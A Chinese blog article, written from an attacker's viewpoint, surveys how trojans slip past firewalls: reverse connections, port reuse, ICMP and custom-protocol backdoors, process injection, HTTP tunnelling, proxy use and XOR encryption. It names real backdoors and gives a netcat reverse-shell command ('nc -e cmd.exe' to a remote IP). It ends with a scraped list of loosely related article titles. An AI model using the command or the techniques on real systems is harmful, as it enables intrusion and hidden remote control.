网络不太平,谁上网都会架起个firewall来防护网络攻击,这岂不是给我们木马的生存带来了巨大挑战?

  物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:

  1. 首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)

  对付这种机器好办,随便哪个马一般都行典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)

  rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)

  2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)

  道高一尺,魔高一丈.:

  你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)

  使用工具netcat就可以穿刺这种防火墙 :

  nc -e cmd.exe 远程ip 远程监听port

  随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等

  典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )

  还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)

  典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)

  更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈

  典型的如ntrootkit采用了自定义协议技术.

  3.应用程序筛选.(只允许特定程序访问网络)

  木马也不甘落后,自己不能访问网络,只好寄人篱下:

  进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入

  现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等.

  4.协议筛选.

  (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-)

  怎么办? 暗渡陈仓, 挖隧道: http-tunnel (http隧道)将木马通信封装成http数据报进行传输.

  使用这种技术的有pcshare(使用双向http隧道传输)

  5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:

  比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!

  可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵

  6. 加密现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密.

  但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用.

  同时,综合利用以上对抗技术的木马也不鲜见了.

  木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展

木马是如何穿过防火墙的相关推荐

  1. 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

    实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...

  2. Windows XP系统总命令集合

    (转)Windows XP系统总命令集合 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------w ...

  3. 穿过任意防火墙NAT的远程控制软件TeamViewer

    这两天有个想法,就是把自己收集的大量视频教程文档和各位网友分享一下.因为很多资源在网上很难找到,或者是即便找到了要么是收费下载要么是下载速度慢到难以忍受的程度,好不容易找到一个rayfile或者纳米盘 ...

  4. 为您详细解析防火墙的工作原理

    http://www.cnw.com.cn/cnw07/security/FireWall/htm2007/20071030_27310.shtml "黑客会打上我的主意吗?"这么 ...

  5. 黑客突破防火墙常用的几种技术(转)

    一.防火墙基本原理 首先,我们需要了解一些基本的防火墙实现原理.防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙.但是他们的基本实现都是类似的. │ │---路由器-----网卡│防火墙│ ...

  6. [ 笔记 ] 计算机网络安全_5_防火墙原理与设计

    [笔记] 计算机网络安全:(5)防火墙原理与设计 网络安全基础 internet协议的安全性 Web安全 网络扫描和网络监听 防火墙原理与设计 入侵检测系统 VPN技术 目录 [笔记] 计算机网络安全 ...

  7. 计算机网络安全-----防火墙

    文章目录 一.防火墙概述 二.防火墙的特性 1.防火墙的设计目标 2.防火墙的常用技术 3.防火墙具有的典型功能 4.防火墙具有的局限性 三.防火墙的技术 1.包过滤技术 2.代理服务技术 3.状态检 ...

  8. [原创+总结]防火墙常见日志分析

    先申明本文不是什么技术文章,心情开朗就随便写写整理下(偶补考过了,高兴ing) 两年没用防火墙了(只做测试用),昨天装了个天网,感受下!以最常见的天网防火墙为例,一般日志分为三行,第一行反映了数据包的 ...

  9. 计算机 管理 防火墙设置在哪里,系统防火墙设置

    系统防火墙设置是为了互相交流信息,局域网用户一般会在自己工作站中将重要信息设置成共享状态,但是许多木马程序或网络病毒常常会以文件共享作为入侵"通道".而在默认状态下,防火墙会阻碍局 ...

最新文章

  1. CSS em与px区别-CSS教程
  2. JavaScript 开发进阶:理解 JavaScript 作用域和作用域链(上)
  3. winform是如何自动弹出软键盘_自媒体广告如何创造出更大的价值?
  4. python的中文含义-python __all__ 含义
  5. [Zer0pts2020]ROR
  6. js向jsp传中文出现乱码的解决方法
  7. 【LiveVideoStack线上分享】— 海外复杂网络环境下的视频播放体验优化
  8. ubuntu下sudo命令不能使用问题
  9. web服务器 apache_如何配置Apache Web服务器
  10. 前端必须懂的计算机网络知识—(XSS、CSRF和HTTPS)
  11. CUDA的内存泄露问题及解决办法
  12. 基于javaweb房屋租赁系统设计与实现
  13. Unity优化百科(UWA 博客目录)
  14. Qt:如何生成word报表
  15. 芝诺志愿者走进养老院送温暖
  16. windows下postgres数据库软件被损坏的情况下data文件存在恢复数据库
  17. 什么是JSON(详解)
  18. MATLAB学习——低通滤波(频域滤波(一))
  19. android 导航安全密码,您导航的v5.3.8 Android版本
  20. CBC 字节翻转攻击记录—以 Bugku 题目为例

热门文章

  1. C#:实现gnome sort 侏儒排序算法(附完整源码)
  2. 如何设计一个项目的数据库?
  3. 【ChatGPT调教】调教ChatGPT案例
  4. TypeError: Can't convert 'int' object to str implicitly
  5. 华为路由器6to4隧道原理及配置
  6. word里面空白页怎么删除
  7. util是utiliy的缩写,意为多用途的,工具性质的包
  8. 图片打标签labelimg
  9. C++初学者必练基础编程题【第一期】
  10. 网易音乐人2021年度盘点上线 揭晓2021年华语原创音乐年度记忆